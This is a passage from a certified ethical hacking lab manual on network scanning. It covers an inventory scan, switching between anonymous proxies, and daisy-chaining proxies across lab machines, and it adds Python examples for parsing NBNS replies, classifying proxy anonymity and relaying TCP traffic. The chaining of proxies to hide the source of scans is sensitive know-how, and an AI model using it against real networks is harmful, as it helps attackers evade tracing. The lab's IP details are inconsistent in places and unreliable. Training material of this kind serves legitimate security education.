9. In the Authentication Settings wizard, select Connect as, fill in the respective credentials of your Windows Server 2008 virtual machine, and click Next.
Fully customizable layouts and color schemes on all views and reports.
Export data to HTML, XML, Microsoft Excel, and text formats.
Licenses are network-based rather than user-based. In addition, extra licenses to cover additional addresses can be purchased at any time if required.
The program comes with dozens of customizable reports. New reports can be easily added through the user interface.
10. Leave the settings at their defaults and click Finish to complete the wizard.
Ability to generate reports on schedule after every scan, daily, weekly, or monthly.
To configure reports, choose Reports | Configure reports from the main menu and select a report from the tree control on the left. Each report can be configured independently.
11. It displays the scanning progress in the Scan progress window.
FIGURE 11.9: Global Network Inventory final Audit wizard
FIGURE 11.8: Global Network Inventory Authentication settings
Filtering is a quick way to find a subset of data within a dataset. A filtered grid displays only the nodes that meet the criteria you specified for a column or columns.
12. After completion, the scanning results can be viewed as shown in the following figure.
Global Network Inventory lets you change the grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column.
FIGURE 11.11: Global Network Inventory result window
13. Now select the Windows Server 2008 machine from View results to view its individual results.
FIGURE 11.10: Global Network Inventory Scanning Progress
FIGURE 11.12: Global Network Inventory Individual machine results
14. The Scan Summary section gives you a brief summary of the machines that have been scanned.
FIGURE 11.13: Global Inventory Scan Summary tab
15. The BIOS section gives details of the BIOS settings.
The Global Network Inventory grid color scheme is completely customizable. You can change Global Network Inventory colors by selecting Tools | Grid colors from the main menu and changing the colors.
To configure the results history level, choose Scan | Results history level from the main menu and set the desired history level.
Scan only the items that you need by customizing scan elements.
16. The Memory tab summarizes the memory in your scanned machine.
E-mail address - Specifies the e-mail address that people should use when sending e-mail to you at this account. The e-mail address must be in the format name@company, for example, someone@mycompany.com.
17. In the NetBIOS section, complete details can be viewed.
FIGURE 11.15: Global Network Inventory Memory tab
FIGURE 11.14: Global Network Inventory Bios summary tab
Message subject - Type the subject of your message. Global Network Inventory cannot post a message that does not contain a subject.
FIGURE 11.16: Global Network Inventory NetBIOS tab
18. The User Groups tab shows user account details with the workgroup.
Name - Specifies the friendly name associated with your e-mail address. When you send messages, this name appears in the From box of your outgoing messages.
19. The Logged on tab shows detailed logged-on details of the machine.
FIGURE 11.17: Global Network Inventory User groups section
Port - Specifies the port number you connect to on your outgoing e-mail (SMTP) server. This port number is usually 25.
20. The Port connectors section shows the ports connected in the network.
Outgoing mail (SMTP) - Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages.
21. The Services section gives the details of the services installed on the machine.
FIGURE 11.19: Global Network Inventory Port connectors tab
FIGURE 11.18: Global Network Inventory Logged on Section
FIGURE 11.20: Global Network Inventory Services Section
22. The Network Adapters section shows the adapter IP and adapter type.
To create a new custom report that includes more than one scan element, choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, customize the settings as desired, and click the OK button.
A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory uses a blank password.
FIGURE 11.21: Global Network Inventory Network Adapter tab
Lab Analysis
Document all the IP addresses, open ports, running applications, and protocols you discovered during the lab.
Tool/Utility: Global Network Inventory
Information Collected/Objectives Achieved:
IP Scan Range: 10.0.0.1 - 10.0.0.50
Scanned IP Addresses: 10.0.0.7, 10.0.0.4
Result:
■ Scan summary
■ BIOS
■ Memory
■ NetBIOS
■ User Groups
■ Logged On
■ Port connectors
■ Services
■ Network Adapters
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Can Global Network Inventory audit remote computers and network
appliances, and if yes, how?
2. How can you export the Global Network agent to a shared network
directory?
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Anonymous Browsing Using Proxy Switcher
Proxy Switcher allows you to automatically execute actions based on the detected network connection.
Lab Scenario
In the previous lab, you gathered information like the scan summary, NetBIOS details, services running on a computer, etc. using Global Network Inventory. NetBIOS provides programs with a uniform set of commands for requesting the lower-level services that the programs must have to manage names, conduct sessions, and send datagrams between nodes on a network. A vulnerability has been identified in Microsoft Windows that involves one of the NetBIOS over TCP/IP (NetBT) services, the NetBIOS Name Server (NBNS). With this service, the attacker can find a computer's IP address by using its NetBIOS name, and vice versa. The response to a NetBT name service query may contain random data from the destination computer's memory; an attacker could seek to exploit this vulnerability by sending the destination computer a NetBT name service query and then looking carefully at the response to determine whether any random data from that computer's memory is included.
As an expert penetration tester, you should follow typical security practices; to block such Internet-based attacks, block User Datagram Protocol (UDP) port 137 at the firewall. You must also understand how networks are scanned using Proxy Switcher.
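The NetBIOS tab of the previous lab and the NBNS response described above both rest on the RFC 1002 node status record. The parser below is added here and is not code from the CEH manual or from Global Network Inventory: it decodes such a response (name, suffix, Unique/Group, MAC) and reports any bytes that lie outside the defined structure, which is how a defender could audit captured replies from their own hosts for the padding described above. The sample datagrams are constructed inline from the names shown in the lab's NetBIOS tab; the MAC address is a placeholder.

```python
"""Parse and sanity-check a NetBIOS Name Service (NBNS, UDP/137) node-status reply.

Added example for this lab; not code from the CEH manual or from Global Network
Inventory. Decodes the NBSTAT answer (RFC 1002 section 4.2.18) and counts bytes
that sit outside the RFC 1002 layout. All datagrams are constructed inline.
"""
import struct

NBSTAT_TYPE = 0x0021     # RR type for a node status request/response
NODE_NAME_LEN = 18       # 15-byte space-padded name + suffix byte + 2 flag bytes
STATISTICS_LEN = 46      # fixed STATISTICS block that closes the RDATA

# Labels for the suffix/type pairs that appear in the lab's NetBIOS tab.
SUFFIXES = {
    (0x00, False): "Workstation Service",
    (0x20, False): "File Server Service",
    (0x00, True): "Domain Name",
}


def first_level_encode(raw16):
    """RFC 1001 14.1: split each byte of a 16-byte name into two 'A'-based nibbles."""
    encoded = bytes(b for c in raw16 for b in ((c >> 4) + 0x41, (c & 0x0F) + 0x41))
    return bytes([len(encoded)]) + encoded + b"\x00"


def skip_name(pkt, off):
    """Return the offset just past an encoded name (label list or compression pointer)."""
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:           # pointer: two bytes, nothing follows it
            return off + 2
        off += 1 + length
        if length == 0:                     # zero-length label terminates the name
            return off


def parse_node_status(pkt):
    """Decode a node status response; also count bytes outside the RFC 1002 layout."""
    _txid, flags, qdcount, ancount, _ns, _ar = struct.unpack(">6H", pkt[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an NBNS response carrying an answer")
    off = 12
    for _ in range(qdcount):                # tolerate an echoed question section
        off = skip_name(pkt, off) + 4
    off = skip_name(pkt, off)
    rtype, _rclass, _ttl, rdlength = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    if rtype != NBSTAT_TYPE:
        raise ValueError("answer is not an NBSTAT record")
    rdata = pkt[off:off + rdlength]
    num_names = rdata[0]
    expected = 1 + NODE_NAME_LEN * num_names + STATISTICS_LEN
    if rdlength < expected:
        raise ValueError("RDATA shorter than the declared name count allows")
    names, pos = [], 1
    for _ in range(num_names):
        raw, suffix = rdata[pos:pos + 15], rdata[pos + 15]
        (nflags,) = struct.unpack(">H", rdata[pos + 16:pos + 18])
        group = bool(nflags & 0x8000)       # G bit: group name vs unique name
        names.append({
            "name": raw.rstrip(b" \x00").decode("ascii", "replace"),
            "suffix": suffix,
            "group": group,
            "description": SUFFIXES.get((suffix, group), "Other"),
        })
        pos += NODE_NAME_LEN
    mac = "-".join(f"{b:02X}" for b in rdata[pos:pos + 6])   # UNIT_ID field
    # Bytes beyond the defined structure, either inside RDATA or after the record.
    trailing = (rdlength - expected) + max(0, len(pkt) - (off + rdlength))
    return {"names": names, "mac": mac, "trailing_bytes": trailing}


def build_node_status_response(txid, names, mac, padding=b""):
    """Construct a response shaped like the lab host's reply (sample data only)."""
    rdata = bytes([len(names)])
    for name, suffix, group in names:
        nflags = (0x8000 if group else 0) | 0x0400          # ACT: name is active
        rdata += name.ljust(15).encode("ascii") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += mac + b"\x00" * (STATISTICS_LEN - 6)           # UNIT_ID, zeroed counters
    rdata += padding                                         # anything here is outside the spec
    header = struct.pack(">6H", txid, 0x8400, 0, 1, 0, 0)   # response + authoritative answer
    rr_name = first_level_encode(b"*" + b"\x00" * 15)        # the node-status wildcard name
    rr_fixed = struct.pack(">HHIH", NBSTAT_TYPE, 0x0001, 0, len(rdata))
    return header + rr_name + rr_fixed + rdata


# Names taken from the lab's NetBIOS tab; the MAC is a constructed placeholder.
LAB_NAMES = [("WIN-D39MR5HL9E4", 0x00, False),
             ("WIN-D39MR5HL9E4", 0x20, False),
             ("WORKGROUP", 0x00, True)]
PLACEHOLDER_MAC = bytes.fromhex("020000000001")
SAMPLE_CLEAN = build_node_status_response(0x1234, LAB_NAMES, PLACEHOLDER_MAC)
SAMPLE_PADDED = build_node_status_response(0x1235, LAB_NAMES, PLACEHOLDER_MAC, b"\xde\xad" * 4)

if __name__ == "__main__":
    for label, pkt in (("clean", SAMPLE_CLEAN), ("padded", SAMPLE_PADDED)):
        result = parse_node_status(pkt)
        print(f"[{label}] MAC {result['mac']}, {result['trailing_bytes']} byte(s) outside the structure")
        for entry in result["names"]:
            kind = "Group" if entry["group"] else "Unique"
            print(f"  {entry['name']:<15} <{entry['suffix']:02X}> {kind:<6} {entry['description']}")
```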
Lab Objectives
This lab will show you how networks can be scanned and how to use Proxy
Switcher. It will teach you how to:
■ Hide your IP address from the websites you visit
■ Proxy server switching for improved anonymous surfing
Lab Environment
To carry out the lab, you need:
■ Proxy Switcher is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher
■ You can also download the latest version of Proxy Workbench from this link: http://www.proxyswitcher.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Proxy Switcher
■ Administrative privileges to run tools
Lab Duration
Time: 15 Minutes
Overview of Proxy Switcher
Proxy Switcher allows you to automatically execute actions, based on the detected
network connection. As the name indicates, Proxy Switcher comes with some
default actions, for example, setting proxy settings for Internet Explorer, Firefox,
and Opera.
Lab Tasks
1. Install Proxy Workbench in Windows Server 2012 (host machine).
2. Proxy Switcher is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher
3. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system.
4. This lab will work in the CEH lab environment on Windows Server 2012, Windows Server 2008, and Windows 7.
5. Open the Firefox browser in your Windows Server 2012, go to Tools, and click Options in the menu bar.
Automatic change of proxy configurations (or any other action) based on network information.
FIGURE 12.1: Firefox options tab
6. Go to the Advanced panel in the Firefox Options window, select the Network tab, and then click Settings.
FIGURE 12.2: Firefox Network Settings
7. Select the Use system proxy settings radio button, and click OK.
Often different Internet connections require completely different proxy server settings, and it's a real pain to change them manually.
Proxy Switcher is fully compatible with Internet Explorer, Firefox, Opera, and other programs.
Proxy Switcher supports the following command line options:
-d: Activate direct connection
FIGURE 12.3: Firefox Connection Settings
8. Now, to install Proxy Switcher Standard, follow the wizard-driven installation steps.
9. To launch Proxy Switcher Standard, go to the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 12.4: Windows Server 2012 - Desktop view
10. Click the Proxy Switcher Standard app to open the Proxy Switcher window.
OR
Click Proxy Switcher from the tray icon list.
TASK 1: Downloading proxy servers
FIGURE 12.5: Windows Server 2012 - Apps
FIGURE 12.6: Select Proxy Switcher
11. The Proxy List Wizard will appear as shown in the following figure; click Next.
Proxy Switcher is free to use without limitations for personal and commercial use.
If the server becomes inaccessible, Proxy Switcher will try to find a working proxy server; a reddish background will be displayed until a working proxy server is found.
Proxy Switcher supports LAN, dial-up, VPN and other RAS connections.
12. Select the Find New Servers, Rescan Servers, Recheck Dead radio button under Common Tasks, and click Finish.
Proxy switching can also be done from the command line (useful at logon to set connection settings automatically).
13. The downloaded proxy servers appear, grouped by category in the left panel and listed in the right panel.
FIGURE 12.7: Proxy List Wizard (screenshot: "Welcome to the Proxy Switcher. Using this wizard you can quickly complete common proxy list management tasks. To continue, click Next", with "Show Wizard on Startup" checked)
FIGURE 12.8: Select common tasks (screenshot: Common Tasks radio buttons "Find New Servers, Rescan Servers, Recheck Dead" (selected), "Find 100 New Proxy Servers", "Find New Proxy Servers Located in a Specific Country", "Rescan Working and Anonymous Proxy Servers"; Click Finish to continue)
FIGURE 12.9: List of downloaded proxy servers (screenshot: Proxy Switcher Unregistered (Direct Connection); left panel Proxy Scanner tree with the categories New, High Anonymous, SSL, Elite, Dead, Permanently, Basic Anonymity, Private, Dangerous, My Proxy Servers and ProxySwitcher; right panel columns Server, State, Response and Country with entries in the Testing and Untested states; bottom panel shows download progress per proxy-list source)
14. To stop downloading proxy servers, click Cancel in the download panel.
FIGURE 12.10: Click on Start button (screenshot: the server list now shows entries in the (Alive-SSL) state with response times in ms and their countries; the log pane at the bottom reports servers "tested as [Dead] because connection timed out"; Keep Alive and Auto Switch are disabled)
15. Click Basic Anonymity in the left panel; the right panel lists the downloaded proxy servers in that category.
When Proxy Switcher is running in Keep-Alive mode it tries to maintain a working proxy server connection by switching to a different proxy server if the current one dies.
When the active proxy server becomes inaccessible, Proxy Switcher picks a different server from the ProxySwitcher category.
If the active proxy server is currently alive, the background is green.
FIGURE 12.11: Selecting a downloaded proxy server from Basic Anonymity (screenshot: servers in the Alive and (Alive-SSL) states with response times and countries; the log pane reports entries "tested as [Alive]" and "tested as [(Alive-SSL)]")
16. Select a proxy server IP address in the right panel and click the switch icon on the toolbar to switch to the selected proxy server.
FIGURE 12.12: Selecting the proxy server (screenshot: a server row highlighted in the right panel; Keep Alive and Auto Switch disabled)
17. The selected proxy server connects, and the window title changes to show the active proxy as in the following figure.
When running in Auto Switch mode, Proxy Switcher switches the active proxy server regularly. The switching period can be set with a slider from 5 minutes down to 10 seconds.
In addition to the standard add/remove/edit functions, the proxy manager contains functions useful for anonymous surfing and proxy availability testing.
FIGURE 12.13: Successful connection of the selected proxy (screenshot: window title "Proxy Switcher Unregistered (Active Proxy: 95.110.159.54:8080 - ITALY)")
18. Open a web browser (Firefox) and go to http://www.proxyswitcher.com/check.php to check the connectivity of the selected proxy server; if the connection succeeded, the page looks like the following figure.
FIGURE 12.14: Detected proxy server (screenshot: "Detecting your location" page in Mozilla Firefox reporting "Your possible IP address is: 202.53.11.130, 192.168.1.1", Location: Unknown; Proxy Information: Proxy Server: DETECTED, Proxy IP: 95.110.159.67, Proxy Country: Unknown)
19. Open another tab in the web browser and surf anonymously through this proxy.
Starting from version 3.0, Proxy Switcher incorporates an internal proxy server. It is useful when you want to route other applications (besides Internet Explorer) that support an HTTP proxy through Proxy Switcher. By default it waits for connections on localhost:3128.
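The check in step 18 works from the only two things a remote site has: the TCP peer address and the request headers the proxy passes along. The following Python is an added example, not part of the lab manual or of Proxy Switcher. It classifies one request into the transparent / anonymous / elite levels (assumed here to correspond loosely to the scanner's Basic Anonymity and High Anonymous categories) using the standard Via, X-Forwarded-For and Forwarded headers. Every header set and address in it is constructed; the "transparent" sample is shaped like the result in Figure 12.14, where the check page reported both a public and a private address, which is what a leaked X-Forwarded-For looks like from the server side.

```python
"""Classify the anonymity of an HTTP proxy from what the target server sees.

Added example, not part of the CEH lab manual or of Proxy Switcher. A proxy
check page like the one visited in step 18 can only work from the TCP peer
address plus the request headers, and that is all classify() uses. The header
names are the standard ones forwarding proxies add (Via, X-Forwarded-For,
Forwarded); the sample inputs below are constructed, not captured traffic.
"""
from ipaddress import ip_address

# Any of these headers marks the request as proxied; only a leaked client
# address additionally makes the proxy "transparent".
PROXY_MARKERS = ("via", "x-forwarded-for", "forwarded", "x-proxy-id",
                 "proxy-connection", "x-real-ip", "client-ip")
CLIENT_ADDR_HEADERS = ("x-forwarded-for", "x-real-ip", "client-ip")


def is_private(addr: str) -> bool:
    """True for RFC 1918 / loopback style addresses; False for anything unparsable."""
    try:
        return ip_address(addr).is_private
    except ValueError:
        return False


def classify(headers: dict, peer_ip: str) -> dict:
    """Return the server-side view of one request.

    level is one of:
      'transparent' - proxy headers present and a client address leaked
      'anonymous'   - proxy is detectable, but no client address leaked
      'elite'       - indistinguishable from a direct connection
    """
    h = {k.lower(): v for k, v in headers.items()}
    leaked = []
    for name in CLIENT_ADDR_HEADERS:
        for part in h.get(name, "").split(","):
            part = part.strip()
            if part and part != peer_ip and part not in leaked:
                leaked.append(part)
    # RFC 7239 Forwarded: for=203.0.113.5;proto=http  (quotes/brackets allowed)
    for token in h.get("forwarded", "").replace(";", ",").split(","):
        token = token.strip()
        if token.lower().startswith("for="):
            addr = token[4:].strip('"[]')
            if addr and addr != peer_ip and addr not in leaked:
                leaked.append(addr)
    detected = any(name in h for name in PROXY_MARKERS)
    level = "transparent" if leaked else "anonymous" if detected else "elite"
    return {
        "peer": peer_ip,
        "proxy_detected": detected,
        "leaked": leaked,
        "internal_leaked": [a for a in leaked if is_private(a)],
        "level": level,
    }


# Constructed samples: peer_ip is what the TCP connection shows the server.
SAMPLES = {
    "direct":      ({"Host": "check.example", "User-Agent": "Mozilla/5.0"}, "203.0.113.10"),
    "transparent": ({"Host": "check.example", "Via": "1.1 proxy",
                     "X-Forwarded-For": "192.168.1.1"}, "202.53.11.130"),
    "anonymous":   ({"Host": "check.example", "Via": "1.1 proxy"}, "198.51.100.5"),
}

if __name__ == "__main__":
    for name, (hdrs, peer) in SAMPLES.items():
        print(f"{name:12} {classify(hdrs, peer)}")
```

Run it directly to print the three verdicts. The same headers are what make a proxied request traceable in a web server's logs, so a "transparent" result means the proxy hides nothing, and an "anonymous" one still tells the site that a proxy is in the path.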
FIGURE 12.14: Surfing using the proxy server (screenshot: Mozilla Firefox showing Google Italy search results for "proxy server", i.e. the localised Google site served through the Italian proxy)
After anonymous proxy servers have become available for switching, you can activate any one of them to hide your own address from the sites you visit.
Lab Analysis
Document all the IP addresses of live (SSL) proxy servers and the connectivity you discovered during the lab.
Tool/Utility: Proxy Switcher
Information Collected/Objectives Achieved:
■ Server: list of available proxy servers
■ Selected proxy server IP address: 95.110.159.54
■ Selected proxy country name: ITALY
■ Resulting proxy server IP address (as reported by the check page): 95.110.159.67
Note that the address the check page reports (95.110.159.67) differs from the address the proxy listens on (95.110.159.54): a target site only ever sees the proxy's outbound interface, so record both when documenting a proxy.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Examine which technologies are used for Proxy Switcher.
2. Evaluate why Proxy Switcher is not open source.
Internet Connection Required
☑ Yes ☐ No
Platform Supported
☑ Classroom ☐ iLabs
Lab 13
Daisy Chaining using Proxy Workbench
Proxy Workbench is a unique proxy server, ideal for developers, security experts, and trainers, which displays data in real time.
Lab Scenario
You learned in the previous lab how to hide your actual IP address using Proxy Switcher and browse anonymously. Similarly, an attacker with malicious intent can pose as someone else behind a proxy server and gather information such as the account or bank details of an individual through social engineering. Once the attacker has that information, he or she can use the individual's bank account for online shopping. Attackers sometimes use multiple proxy servers for scanning and attacking, which makes it very difficult for administrators to trace the real source of the attack.
As an administrator you should be able to prevent such attacks by deploying an intrusion detection system, with which you can collect network information for analysis and determine whether an attack or intrusion has occurred. You can also use Proxy Workbench to understand how networks are scanned.
Lab Objectives
This lab shows how networks can be scanned and how to use Proxy Workbench. It teaches you how to:
■ Use the Proxy Workbench tool
■ Daisy chain the Windows host machine and the virtual machines
Lab Environment
To carry out the lab, you need:
■ Proxy Workbench, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench
■ You can also download the latest version of Proxy Workbench from http://proxyworkbench.com
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as the attacker (host machine)
■ Other computers running Windows Server 2008 and Windows 7 as victims (virtual machines)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Proxy Workbench
■ Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Proxy Workbench
Proxy Workbench is a proxy server that displays its data in real time. It shows the data flowing between the web browser and the web server, and it also analyzes FTP in passive and active modes.
Lab Tasks
1. Install Proxy Workbench on all Windows platforms used in this lab (Windows Server 2012, Windows Server 2008, and Windows 7).
2. Proxy Workbench is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench.
3. You can also download the latest version of Proxy Workbench from http://proxyworkbench.com.
4. Follow the wizard-driven installation steps and install it on all the Windows platforms.
5. This lab works in the CEH lab environment on Windows Server 2012, Windows Server 2008 and Windows 7.
6. Open the Firefox browser on Windows Server 2012, go to Tools and click Options.
Security: Proxy servers provide a level of security within a network. When the proxy is the only way into the network from the Internet, it becomes a choke point at which traffic can be inspected and attacks can be blocked.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 13.1: Firefox Options tab (screenshot: Google home page in Mozilla Firefox with the Tools menu open, showing Downloads, Add-ons, Set Up Sync, Web Developer, Page Info, Clear Recent History and Options)
7. Go to the Advanced panel of the Firefox Options window, select the Network tab, and click Settings.
FIGURE 13.2: Firefox Network Settings (screenshot: Options window with the panels General, Tabs, Content, Applications, Privacy, Security, Sync and Advanced; on the Advanced > Network tab: Connection "Configure how Firefox connects to the Internet" with a Settings button, Cached Web Content (currently using 8.7 MB of disk space, "Override automatic cache management", "Limit cache to 1024 MB of space") and Offline Web Content and User Data)
The sockets panel shows the number of alive socket connections that Proxy Workbench is managing. During periods of no activity this drops back to zero.
8. Select Manual proxy configuration in the Connection Settings window.
9. Type 127.0.0.1 as the HTTP Proxy, enter 8080 as the port, check Use this proxy server for all protocols, and click OK.
FIGURE 13.3: Firefox Connection Settings (screenshot: Manual proxy configuration selected; HTTP Proxy 127.0.0.1 port 8080; "Use this proxy server for all protocols" checked, so the SSL Proxy, FTP Proxy and SOCKS Host are 127.0.0.1 port 8080 as well; SOCKS v5; No Proxy for localhost, 127.0.0.1)
10. If you encounter a port error while configuring, ignore it.
11. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 13.4: Windows Server 2012 - Desktop view
12. Click the Proxy Workbench app to open the Proxy Workbench window.
The status bar shows the details of Proxy Workbench's activity. The first panel displays the amount of data Proxy Workbench currently holds in memory. The actual amount of memory Proxy Workbench consumes is generally much more than this, because of the overhead of managing it.
FIGURE 13.5: Windows Server 2012 - Apps (screenshot: Start screen tiles including Server Manager, Windows PowerShell, Google Chrome, Hyper-V Manager, Control Panel, Hyper-V Virtual Machine, SQL Server, Command Prompt, Mozilla Firefox, Global Network Inventory and Proxy Workbench)
13. The Proxy Workbench main window appears as shown in the following figure.
FIGURE 13.6: Proxy Workbench main window (screenshot: "Details for All Activity" lists connections From 127.0.0.1:51199 and upwards To 173.194.36.24:80 (www.g...) and 173.194.36.21:443 (mail.g...), Protocol HTTP, with start times; the listener tree shows SMTP - Outgoing e-mail (25), POP3 - Incoming e-mail (110), HTTP Proxy - Web (8080), HTTPS Proxy - Secure Web (443), FTP - File Transfer Protocol (21) and Pass Through - For Testing Apps (1000); the "Real time data for All Activity" pane shows a hex/ASCII dump of a browser request carrying User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1, Proxy-Connection: keep-alive and Host: mail.google.com; status bar: Memory 95 KByte, Sockets 100, Events 754)
14. Go to Tools on the menu bar and select Configure Ports.
The events panel displays the total number of events Proxy Workbench holds in memory. Clearing the data (File > Clear All Data) brings this back to zero if no connections are alive.
The last panel displays the current time as reported by your operating system.
FIGURE 13.7: Proxy Workbench Configure Ports option (screenshot: the same main window with the Tools menu open, showing Save Data..., Configure Ports..., Failure Simulation..., Real Time Logging... and Options...)
15. In the Configure Proxy Workbench window, select 8080 HTTP Proxy - Web in the left pane, Ports to listen on.
16. Check HTTP in the right pane, Protocol assigned to port 8080, and click Configure HTTP for port 8080.
FIGURE 13.8: Proxy Workbench, configuring HTTP for port 8080 (screenshot: Ports to listen on: 25 SMTP - Outgoing e-mail, 110 POP3 - Incoming e-mail, 8080 HTTP Proxy - Web, 443 HTTPS Proxy - Secure Web, 21 FTP - File Transfer Protocol, 1000 Pass Through - For Testing Apps; Protocol assigned to port 8080: <Don't use>, Pass Through, HTTP (checked), HTTPS, POP3, FTP; buttons Add, Delete, Configure HTTP for port 8080 and Close; "Show this screen at startup" checked)
17. The HTTP Properties window appears. Select Connect via another proxy, enter the IP address of your Windows Server 2008 virtual machine as the Proxy server, enter 8080 as the Port, and click OK.
The "Show the real time data window" option lets the user specify whether the real-time data pane is displayed.
People who benefit from Proxy Workbench:
■ Home users who have taken the first step in understanding the Internet and are starting to ask "But how does it work?"
■ People who are curious about how their web browser, email client or FTP client communicates with the Internet.
■ People who are concerned about malicious programs sending sensitive information out to the Internet. The information that programs are sending can be readily identified.
■ Internet software developers who are writing programs to existing protocols. Software development for the Internet is often very complex, especially when a program is not properly adhering to a protocol. Proxy Workbench allows developers to instantly identify protocol problems.
■ Internet software developers who are creating new protocols and developing the client and server software simultaneously. Proxy Workbench will help identify non-compliant protocol
■ Internet security experts will benefit from seeing the data flowing in real time. This helps them see who is doing what, and when.
Many people understand sockets much better than they think. When you surf the web and go to a site called www.altavista.com, you are actually directing your web browser to open a socket connection to the server called "www.altavista.com" on port number 80.
FIGURE 13.9: Proxy Workbench HTTP properties for port 8080
18. Click Close in the Configure Proxy Workbench window after completing the configuration settings.
Real time logging lets you record everything Proxy Workbench does to a text file. The information can then be imported into a spreadsheet or database for more advanced analysis.
19. Repeat the Proxy Workbench configuration steps, Step 11 to Step 15, on the Windows Server 2008 virtual machine.
FIGURE 13.10: Proxy Workbench configured proxy (screenshot: the Configure Proxy Workbench window with 8080 HTTP Proxy - Web selected and HTTP assigned, plus the HTTP Properties dialog with "Connect via another proxy" selected, Proxy server 10.0.0.7, Port 8080, and OK/Cancel buttons)
20. On Windows Server 2008, enter the IP address of the Windows 7 virtual machine as the proxy server in the same HTTP Properties dialog.
21. Open Firefox on the Windows Server 2012 host, which was configured in step 9 to use 127.0.0.1:8080, and browse some web pages.
22. Proxy Workbench on Windows Server 2012 shows the generated traffic as in the following figure.
23. Check the To column: the traffic is being forwarded to 10.0.0.3 (the Windows Server 2008 virtual machine).
FIGURE 13.11: Proxy Workbench generated traffic on the Windows Server 2012 host machine (screenshot: the details list for HTTP Proxy - Web (8080) with From, To, Protocol, Started and Finished columns and byte counts per connection, and the real-time hex/ASCII pane showing an HTTP response with Expires, Date, Cache-Control: max-age and Connection: keep-alive headers)
24. Now log in to the Windows Server 2008 virtual machine and check the To column there: the traffic is being forwarded to 10.0.0.7 (the Windows 7 virtual machine).
FIGURE 13.12: Proxy Workbench Generated Traffic in Windows Server 2008 Virtual Machine
Proxy Workbench changes this. Not only is it an awesome proxy server, but you can see all of the data flowing through it, visually display a socket connection history and save it to HTML.

And now, Proxy Workbench includes connection failure simulation strategies. What this means is that you can simulate a poor network, a slow Internet or an unresponsive server. This makes it the definitive TCP application tester.
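The following is an added example, not Proxy Workbench's own code: a small logging TCP relay that does what the sidebar describes, forwarding each client connection to an upstream host while recording every byte in both directions, with two connection-failure simulations ("refuse" closes the client at once, "terminate" drops the session after a number of client bytes). The echo server standing in for the upstream host, the loopback addresses and the payload are constructed for the demo.

```python
# Minimal logging TCP relay (added example; not Proxy Workbench's own code):
# accept a client, connect onward, copy bytes both ways, record every byte, and
# simulate two connection failures ("refuse" at once, "terminate" after N bytes).
import select
import socket
import threading
from dataclasses import dataclass, field


@dataclass
class Session:
    client: tuple
    client_to_server: bytearray = field(default_factory=bytearray)
    server_to_client: bytearray = field(default_factory=bytearray)
    terminated: bool = False


class LoggingRelay:
    def __init__(self, upstream, mode="pass", terminate_after=0):
        self.upstream, self.mode, self.terminate_after = upstream, mode, terminate_after
        self.sessions, self._handlers = [], []
        self._srv = socket.socket()
        self._srv.bind(("127.0.0.1", 0))          # ephemeral port, exposed as self.port
        self._srv.listen(5)
        self.port = self._srv.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            conn, addr = self._srv.accept()
            t = threading.Thread(target=self._handle, args=(conn, addr), daemon=True)
            self._handlers.append(t)
            t.start()

    def _handle(self, conn, addr):
        sess = Session(client=addr)
        self.sessions.append(sess)
        if self.mode == "refuse":                  # failure simulation: refuse outright
            sess.terminated = True
            conn.close()
            return
        up = socket.create_connection(self.upstream, timeout=5)
        self._relay(conn, up, sess)
        conn.close()
        up.close()

    def _relay(self, conn, up, sess):
        peer = {conn: (up, sess.client_to_server), up: (conn, sess.server_to_client)}
        while True:
            ready, _, _ = select.select([conn, up], [], [], 5)
            if not ready:                          # idle for 5 s: give up
                return
            for src in ready:
                dst, log = peer[src]
                data = src.recv(4096)
                if not data:                       # one side closed: end the session
                    return
                log += data                        # record first, then forward
                if self.mode == "terminate" and src is conn and len(log) >= self.terminate_after:
                    sess.terminated = True         # failure simulation: drop mid-session
                    return
                dst.sendall(data)

    def wait(self):                                # block until all sessions are handled
        for t in list(self._handlers):
            t.join()


def start_echo_server():
    srv = socket.socket()                          # constructed upstream (stands in for 10.0.0.7)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            c, _ = srv.accept()
            with c:
                for data in iter(lambda: c.recv(4096), b""):
                    c.sendall(data)                # echo whatever arrives
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


def relay_roundtrip(relay, payload):
    """Send payload through the relay and return what the client got back."""
    c = socket.create_connection(("127.0.0.1", relay.port), timeout=5)
    reply = b""
    try:
        c.sendall(payload)
        while len(reply) < len(payload) and (chunk := c.recv(4096)):
            reply += chunk
    except OSError:                                # refused/terminated sessions land here
        pass
    c.close()
    relay.wait()
    return reply
```

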